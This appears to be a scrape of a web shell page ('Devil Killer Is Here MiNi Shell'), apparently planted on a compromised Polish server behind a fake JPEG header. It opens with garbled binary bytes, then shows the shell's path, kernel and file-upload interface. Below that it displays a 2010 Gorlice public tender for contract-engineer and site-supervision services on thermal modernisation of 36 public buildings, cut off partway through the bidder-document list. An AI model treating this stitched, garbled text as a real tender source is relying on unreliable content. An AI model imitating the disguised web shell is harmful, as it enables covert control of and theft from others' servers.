JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100726/199521-N-2010.html

<p class="kh_header"><b>Gorlice: Pełnienie funkcji Inżyniera Kontraktu-Inspektora Nadzoru obejmującego zastępstwo inwestorskie wraz z pełnieniem funkcji inspektora nadzoru inwestorskiego zgodnie z polskim prawem budowlanym przy realizacji zadań: Termomodernizacja obiektów użyteczności publicznej na terenie gmin Ziemi Gorlickiej Współfinansowanego w ranach działania 9.3. POIiŚ.</b><br>
<b>Numer ogłoszenia: 199521 - 2010; data zamieszczenia: 26.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Związek Gmin Ziemi Gorlickiej , ul. Jagiełły 10, 38-300 Gorlice, woj. małopolskie, tel. 18 352 43 06, faks 18 352 43 06.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu-Inspektora Nadzoru obejmującego zastępstwo inwestorskie wraz z pełnieniem funkcji inspektora nadzoru inwestorskiego zgodnie z polskim prawem budowlanym przy realizacji zadań: Termomodernizacja obiektów użyteczności publicznej na terenie gmin Ziemi Gorlickiej Współfinansowanego w ranach działania 9.3. POIiŚ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego usług polegających na wykonywaniu funkcji Inżyniera Kontraktu-Inspektora Nadzoru obejmującego zastępstwo inwestorskie wraz z pełnieniem funkcji inspektora nadzoru inwestorskiego zgodnie z polskim prawem budowlanym przy realizacji robót budowlanych związanych z termomodernizacją 36 budynków użyteczności publicznej na terenie gmin: Biecz, Bobowa, Lipinki, Moszczenica, Sękowa, Ropa  i Miasta Gorlice w ramach projektu Termomodernizacja obiektów użyteczności publicznej na terenie gmin Ziemi Gorlickiej. Szacunkowa wartość robót budowlanych objętych niniejszym projektem zgodnie z zapisami wniosku o dofinansowanie wynosi ok. 19,8 mln zł netto. Szczegółowy wykaz budynków zawarty został w SIWZ.
2.Przedmiot zamówienia obejmuje:
a) weryfikację dokumentacji projektowej, przekazanie Zamawiającemu wykazu koniecznych uzupełnień i poprawek, udział w egzekwowaniu przez zamawiającego od autorów projektów budowlanych uzupełnień i poprawek oraz  dostosowania ich zakresu i formy do obowiązujących aktualnie wymogów formalnoprawnych a szczególnie rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. Nr 120 poz. 1133, zm. Dz.U. z 2008 r. Nr 201, poz. 1239) oraz w zakresie aktualizacji lub
sporządzenia i aktualizacji kosztorysów inwestorskich pod względem wartości wg. wymogów art 35 ust. 1 Pzp. Wnioskowanie do Zamawiającego o uzyskanie, jeśli w wyniku aktualizacji  dokumentacji projektowej będą wymagane, zmiany decyzji pozwolenia na budowę. Wnioskowanie do Zamawiającego o uzupełnienie dokumentacji projektowej o specyfikacje techniczne wykonania i odbioru robót budowlanych, przedmiary robót. Wnioskowanie do Zamawiającego o uzupełnienie dokumentacji projektowej w wersji elektronicznej w formacie PDF.
b) Przygotowanie dokumentacji przetargowej ( ogłoszenia o zamówieniu, SIWZ, wzorów: umowy oraz ofert lub zaproszeń) oraz udział w przeprowadzeniu przez Zamawiającego postępowania o udzielenie zamówienia publicznego na wyłonienie wykonawcy robót zgodnie z wymaganiami przepisów Pzp.
c) prowadzenie kontroli zgodności realizowanych Kontraktów z warunkami kontraktowymi, dokumentacją projektową, pozwoleniami na budowę, przepisami  prawa i zasadami wiedzy technicznej,
d) udział Inspektorów Nadzoru w naradach organizowanych przez Zamawiającego,
e) udział Inspektorów Nadzoru lub Specjalistów w spotkaniach roboczych organizowanych przez Zamawiającego,
f) przygotowywaniu cyklicznych sprawozdań ( raporty) z postępu robót- raz na miesiąc,
g) nadzór inwestorski,
h) sprawdzanie jakości wykonywanych robót,
i) kontrolę i nadzór nad przepływami finansowymi robót w realizowanym Kontrakcie i
  sporządzanie stosownej określonej dla Kontraktów sprawozdawczości (raportów),
j) współpracę z Zamawiającym w przygotowaniu wszelkich opracowań wymaganych
przez Instytucje finansujące i wspierające,
k) Udział w odbiorach końcowych i oddaniu Zamawiającemu przewidzianych w kontrakcie obiektów,
l) Udział i nadzór w okresie zgłaszania wad i przeprowadzenie odbiorów pogwarancyjnych.
m). Przygotowanie dla Zamawiającego jako Jednostki Realizującej Projekt (JRP) projektów wniosków o płatność za roboty , udział w kwalifikacji kosztów zgodnie z obowiązującymi w tym w  zakresie wytycznymi, monitorowanie zgodności robót z Kontraktem, rzetelne raportowanie,  bieżącą sprawozdawczość na podstawie własnej oceny.
n) Sporządzenie Raportu końcowego Projektu zgodnie z obowiązującymi wytycznymi i zaleceniami Instytucji zaangażowanych w Projekt.
3.W szczególności zakres czynności i obowiązków Wykonawcy obejmuje czynności-obowiązki:
1).przygotować zgłoszenia o rozpoczęciu robót budowlanych do odpowiedniego organu nadzoru budowlanego,
2)być przedstawicielem Zamawiającego na budowie upoważnionym do podejmowania decyzji dotyczących zagadnień technicznych i ekonomicznych tej budowy w ramach dokumentacji projektowej i Prawa budowlanego oraz umowy o jej realizację,
3)wprowadzać w uzgodnieniu z Zamawiającym, autorem projektu i kierownikiem budowy poprawki w dokumentacji projektowej pod warunkiem, że nie spowodują one zwiększenia kosztu nadzorowanych robót budowlanych, nie będą miały wpływu na zasadnicze rozwiązania konstrukcyjne, technologiczne i instalacyjne oraz nie spowodują pogorszenia użyteczności obiektu lub jego wpływu na środowisko naturalne,
4) przekazać kierownikowi budowy dziennik budowy wraz z wypełnioną częścią tytułową,
5)przekazać protokolarnie wykonawcy robót budowlanych teren budowy wraz ze znajdującymi się na nim urządzeniami,
6)sprawować kontrolę przebiegu budowy w zakresie niezbędnym do zabezpieczenia interesów Zamawiającego, 
a w szczególności :
a)kontrolować jakość wykonanych robót, wbudowanych elementów i stosowanych materiałów, zgodność robót z warunkami pozwolenia na budowę, przepisami techniczno - budowlanymi, obowiązującymi normami, zasadami bezpieczeństwa obiektu w toku budowy i przyszłego użytkowania oraz zasadami wiedzy technicznej,
b)kontrolować zgodność wykonania robót z dokumentacją projektową i umową,
c)kontrolować zgodność przebiegu robót z obowiązującym harmonogramem,
d)kontrolować jakość i wartość wykonanych robót w trakcie realizacji i przed odbiorem zakończonego przedmiotu umowy lub jakiejkolwiek jego części skończonej,
e)kontrolować prawidłowość zafakturowania wykonanych robót,
7)kontrolować prawidłowość prowadzenia dziennika budowy i dokonywać w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót,
8)kontrolować budowę co najmniej dwa razy w tygodniu
9)prowadzić narady koordynacyjne na budowie z udziałem wykonawcy robót, Zamawiającego, 
10) rozstrzygać w porozumieniu z kierownikiem budowy wątpliwości natury technicznej powstałe w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu bądź rzeczoznawców,
11)każdorazowo zawiadamiać właściwy organ nadzoru budowlanego o wypadkach naruszenia Prawa budowlanego,
12)sprawdzać i przyjmować roboty podlegające zakryciu lub znikające,
13)stwierdzić wykonanie przez służbę geodezyjną pomiarów inwentaryzacyjnych, a także sprawdzić zgodność usytuowania obiektów z projektem budowlanym,
14)uczestniczyć w przeprowadzanych przez wykonawcę próbach i odbiorach instalacji i urządzeń technicznych,
15)potwierdzać w dzienniku budowy zapis kierownika budowy o gotowości obiektu lub jego części do odbioru oraz należyte urządzenie i uporządkowanie terenu budowy,
16)sprawdzać kompletność przedstawianych przez wykonawcę dokumentów i zaświadczeń niezbędnych do przeprowadzenia odbioru oraz dołączyć do nich opracowaną przez siebie ocenę jakościową wraz z jej uzasadnieniem,
17)gromadzić i przechowywać materiały analityczne niezbędne do rozliczenia wykonanych robót i oceny osiągniętych efektów rzeczowych lub gospodarczych,
18)uczestniczyć w czynnościach odbioru obiektu lub robót i przekazania ich do użytku,
19)przejąć od kierownika budowy dziennik budowy i przekazać go Zamawiającemu,
20)uczestniczyć w komisjach do stwierdzenia ujawnionych wad oraz kontrolować usunięcie tych wad przez wykonawcę,
21)skompletowanie wszystkich świadectw gwarancji i dostarczenie ich Zamawiającemu,
22)udokumentowanie daty, z którą wykonawca wypełnił swoje obowiązki wykonania i zakończenia robót  oraz usunięcia wszelkich stwierdzonych usterek w robotach,
23)podejmowanie decyzji o wykonaniu pilnych prac zabezpieczających,
24)podejmowanie również i innych działań nie wymienionych , które przyczynią się do sprawnego wykonania inwestycji,
25)udział w opracowaniu i przekazaniu do Zamawiającego/Partnerów protokołu przejęcia środka trwałego na druku OT,
26)obsługa okresu gwarancyjnego i rękojmi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.54.00.00-5, 71.31.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał  należycie co najmniej jedną usługę, której przedmiotem było pełnienie roli Inżyniera Kontraktu lub wykonywaniu nadzoru inwestorskiego inwestycji polegającej na realizacji co najmniej  1 zadania polegającego na termomodernizacji obejmującej ocieplenia budynków, przebudowę kotłowni oraz wymianę stolarki okiennej i instalacji grzewczej ( centralne ogrzewania centralna ciepła woda, ciepło wentylacyjne)  o wartości tych robót dla jednego zadania nie mniejszej niż 10,0 mln. zł</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie osobami zdolnymi do wykonania zamówienia tj:
a) Inżynier  Specjalista nr 1
Kwalifikacje zawodowe:
wykształcenie wyższe techniczne
uprawnienia budowlane do kierowania robotami budowlanymi w zakresie:
konstrukcyjno budowlanym lub konstrukcyjno inżynierskim, 
sieci i instalacji sanitarnych bez ograniczeń, 
przynależność do właściwej Izby Samorządu Zawodowego 
Doświadczenie:
nie mniej niż 5 letnie doświadczenie zawodowe licząc od daty uzyskania uprawnień budowlanych;
nie mniej niż 3 letnie doświadczenie zawodowe w pełnieniu stanowiska kierowniczego tj. kierowaniu grupą pracowników;
doświadczenie w kierowaniu lub nadzorowaniu robót budowlanych, na co najmniej jednej zrealizowanej, zakończonej i rozliczonej (wykonanie robót i wystawienie świadectwa przejęcia lub protokołu odbioru końcowego) inwestycji z zakresu termomodernizacji obejmującej ocieplenia budynków, przebudowę kotłowni oraz wymianę stolarki okiennej i instalacji grzewczej ( centralne ogrzewania centralna ciepła woda, ciepło wentylacyjne) .
posiadać uprawnienia do kierowania robotami budowlanymi przy zabytkach nieruchomych, w zakresie budowlanym oraz instalacji sanitarnych tj. zaświadczenie wydane na podstawie :
par. 19 rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 r. w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych ( Dz. U. z 1964 r. Nr 31, poz. 197 )
lub
par. 18 i 20  rozporządzenia Ministra Kultury i Sztuki z dnia 11 stycznia 1994 r. o zasadach i trybie udzielenia zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikowania osób, które maja prawo prowadzenia tej działalności ( Dz. U. z 1994 r. Nr 16, poz. 55 )
lub
może nadzorować roboty w branży instalacji i sieci sanitarnych przy zabytkach nieruchomych w myśl par.8 ust. 2 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych ( Dz. U. z 2004 r.  Nr 150. poz. 1579 ), 
posiadać uprawnienia budowlane do projektowania w zakresie:
architektonicznym i konstrukcyjno-inżynierskim,
sieci i instalacji sanitarnych bez ograniczeń w tym dla obiektów zabytkowych  wydanych  na podstawie ww. przepisów;
b) Inspektor nadzoru w branży instalacyjnej w zakresie sieci i instalacji
sanitarnych  Specjalista nr 2, 3,  nie mniej niż 2 osoby, z których każda musi posiadać:
Kwalifikacje zawodowe:
wykształcenie wyższe techniczne lub średnie techniczne;
uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi, w zakresie wystarczającym do kierowania robotami budowlanymi w zakresie instalacji sanitarnych;
przynależność do właściwej Izby Samorządu Zawodowego.
posiadać uprawnienia do kierowania robotami budowlanymi. w przy zabytkach nieruchomych, w zakresie sieci i instalacji sanitarnych tj. zaświadczenie wydane na podstawie :
par. 19 rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 r. w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych ( Dz. U. z 1964 r. Nr 31, poz. 197 )
lub
par. 18 i 20  rozporządzenia Ministra Kultury i Sztuki z dnia 11 stycznia 1994 r. o zasadach i trybie udzielenia zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikowania osób, które maja prawo prowadzenia tej działalności ( Dz. U. z 1994 r. Nr 16, poz. 55 )
lub
może nadzorować roboty w branży instalacji i sieci sanitarnych przy zabytkach nieruchomych w myśl par.8 ust. 2 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych  ( Dz. U. z 2004 r.  Nr 150. poz. 1579 ), w tym jedna osoba posiadająca uprawnienia budowlane:
do projektowania  bez ograniczeń w specjalności sieci i instalacji sanitarnych oraz do projektowania instalacji sanitarnych  w dla obiektów  zabytkowych tj. zaświadczenie wydane na podstawie ww. przepisów;
Doświadczenie:
nie mniej niż 5 letnie doświadczenie zawodowe licząc od daty uzyskania uprawnień budowlanych przy wykształceniu wyższym;
nie mniej niż 7 letnie doświadczenie zawodowe licząc od daty uzyskania uprawnień budowlanych przy wykształceniu średnim technicznym;
doświadczenie w kierowaniu lub nadzorowaniu robót budowlanych obejmujących roboty związane z termomodernizacją budynków.
c) Inspektor nadzoru w branży budowlanej - Specjalista nr 4,5 nie mniej niż 2 osoby
Kwalifikacje zawodowe:
wykształcenie wyższe techniczne lub średnie techniczne;
uprawnienia budowlane w zakresie wystarczającym do kierowania i nadzorowania robotami budowlanymi w specjalności konstrukcyjno budowlanej lub konstrukcyjno inżynierskim;
przynależność do właściwej Izby Samorządu Zawodowego Izby Inżynierów Budownictwa.
posiadać uprawnienia do kierowania robotami budowlanymi przy zabytkach nieruchomych, w zakresie robót budowlanych tj. zaświadczenie wydane na podstawie :
par. 19 rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 r. w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych ( Dz. U. z 1964 r. Nr 31, poz. 197 )
lub
par. 18 i 20  rozporządzenia Ministra Kultury i Sztuki z dnia 11 stycznia 1994 r. o zasadach i trybie udzielenia zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikowania osób, które maja prawo prowadzenia tej działalności ( Dz. U. z 1994 r. Nr 16, poz. 55 )
 lub
może nadzorować roboty w branży instalacji i sieci sanitarnych przy zabytkach nieruchomych w myśl par.8 ust. 2 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych ( Dz. U. z 2004 r.  Nr 150. poz. 1579 ), 
co najmniej jedna osoba:
posiadająca uprawnienia budowlane do projektowania w zakresie architektonicznym i konstrukcyjno-inżynierskim , w tym dla obiektów zabytkowych  wydanych  na podstawie  ww. przepisów;
Doświadczenie:
nie mniej niż 5 letnie doświadczenie zawodowe licząc od daty uzyskania uprawnień budowlanych.
nie mniej niż 7 letnie doświadczenie zawodowe licząc od daty uzyskania uprawnień budowlanych przy wykształceniu średnim technicznym;
doświadczenie w kierowaniu lub nadzorowaniu robót budowlanych obejmujących roboty związane z termomodernizacją budynków.
d) Inspektor nadzoru w branży elektrycznej - Specjalista nr 6
Kwalifikacje zawodowe:
wykształcenie wyższe techniczne;
uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
przynależność do właściwej Izby Samorządu Zawodowego Izby Inżynierów Budownictwa.
posiadać uprawnienia do kierowania robotami budowlanymi przy zabytkach nieruchomych, w zakresie robót elektrycznych tj. zaświadczenie wydane na podstawie :
par. 19 rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 r. w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych ( Dz. U. z 1964 r. Nr 31, poz. 197 )
lub
par. 18 i 20  rozporządzenia Ministra Kultury i Sztuki z dnia 11 stycznia 1994 r. o zasadach i trybie udzielenia zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikowania osób, które maja prawo prowadzenia tej działalności ( Dz. U. z 1994 r. Nr 16, poz. 55 )
 lub
może nadzorować roboty w branży instalacji i sieci sanitarnych przy zabytkach nieruchomych w myśl par.8 ust. 2 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich,
robót budowlanych, badań konserwatorskich i architektonicznych, a także działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych ( Dz. U. z 2004 r.  Nr 150. poz. 1579 ), 
co najmniej jedna osoba:
posiadająca uprawnienia budowlane do projektowania w zakresie sieci i instalacji elektrycznych, w tym dla obiektów zabytkowych  wydanych  na podstawie  ww. przepisów;
Doświadczenie:
nie mniej niż 5 letnie doświadczenie zawodowe licząc od daty uzyskania uprawnień budowlanych,
doświadczenie w kierowaniu lub nadzorowaniu robót budowlanych obejmujących wykonanie prac elektrycznych i z zakresu AKPiA w co najmniej 1 związaną z przebudową kotłowni.
e) Specjalista ds. obmiarów i rozliczeń  Specjalista nr 7,8  nie mniej niż 2 osoby, z których każda musi posiadać:
Kwalifikacje zawodowe:
wykształcenie wyższe techniczne lub średnie techniczne;
Doświadczenie:
nie mniej niż 3 letnie doświadczenie zawodowe w obmiarach i wycenie robót budowlanych, rozpatrywaniu roszczeń oraz rozliczaniu robót i sprawozdawczości w kontraktach na wykonanie robót budowlanych,
Podany wyżej skład osobowy Zamawiający zakłada jako minimalny i może być przez Wykonawcę zwiększony jeżeli uzna, że jest nie wystarczający do realizacji zamówienia.
Osoby wymienione w pkt. a - e muszą posiadać uprawnienia budowlane, o których mowa w ustawie z dnia 07.07.1994 r. Prawo budowlane (Dz. U. nr 156 poz. 1118 z 2006 r. z późn. zm.) oraz w Rozporządzeniu Ministra Transportu i Budownictwa z
dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. nr 83 poz. 578 z 2006 r. z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, które w zakresie objętym umową pozwalać będą wskazanym osobom na pełnienie funkcji inspektora nadzoru w ww. specjalnościach.
Wykonawca przekaże informacje na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia każdej ze wskazanych osób. Ponadto Wykonawca poda zakres czynności jakie będą wykonywać wskazane osoby
oraz poda informację o podstawie dysponowania tymi osobami. Zamawiający dopuszcza możliwości łączenia funkcji Specjalistów przez jedną osobę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a).posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości nie mniejszej niż 1 000 000 PLN.
b). posiadać w okresie ostatnich 3 lat obrotowych a jeśli okres działalności jest krótszy to z tego okresu, średnie roczne przychody netto ze sprzedaży w wysokości nie mniejszej niż  500 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

